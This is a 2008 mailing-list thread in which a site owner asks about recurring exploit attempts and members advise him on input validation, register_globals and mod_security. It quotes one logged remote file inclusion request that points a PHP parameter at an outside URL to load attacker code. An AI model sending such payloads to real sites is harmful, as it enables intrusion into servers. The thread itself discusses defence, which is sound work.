What index.php are you using?  Is this WordPress?http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00030.htmlThere are many php exploits:  http://archive.cert.uni-stuttgart.de/bugtraq/2007/03/msg00031.htmlwww.Obnosis.com |  http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452Catch the January PLUG HackFest!   Kristy Westphal, CSO for the Arizona Department of Economic
Security will provide a one hour
presentation on forensics.Date: Wed, 3 Dec 2008 14:57:35 -0800From: klsmith2020@yahoo.comSubject: Re: OT: Website ExploitsTo: plug-discuss@lists.plug.phoenix.az.usThank you for the heads up on mod_security.  I'm not sure if that is installed or not.Thanks again!------------------------Keith Smith--- On Wed, 12/3/08, JD Austin <jd@twingeckos.com> wrote:From: JD Austin <jd@twingeckos.com>Subject: Re: OT: Website ExploitsTo: klsmith2020@yahoo.com, "Main PLUG discussion list" <plug-discuss@lists.plug.phoenix.az.us>Date: Wednesday, December 3, 2008, 3:48 PMThat is a fairly common tactic.  It exploits poor input validation and register globals in PHP.Do yourself a huge favor and install mod_security (I assume you're using apache?)as an extra measure of
 security if you haven't already.
On Wed, Dec 3, 2008 at 3:39 PM, keith smith <klsmith2020@yahoo.com> wrote:

Hi,I am working on a website that gets a lot of exploit attempts.They mostly look like this:  /index.php?display=http://humano.ya.com/mysons/index.htm?
Our code is set to disregard any value that is not expected.  I'm wondering if there is a clearing house for reporting this type of stuff.  I have the IP address as reported.... if that is accurate.
Thanks in advance!Keith



      ---------------------------------------------------
PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
---------------------------------------------------PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.usTo subscribe, unsubscribe, or to change your mail settings:http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
_________________________________________________________________
Send e-mail anywhere. No map, no compass.
http://windowslive.com/Explore/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008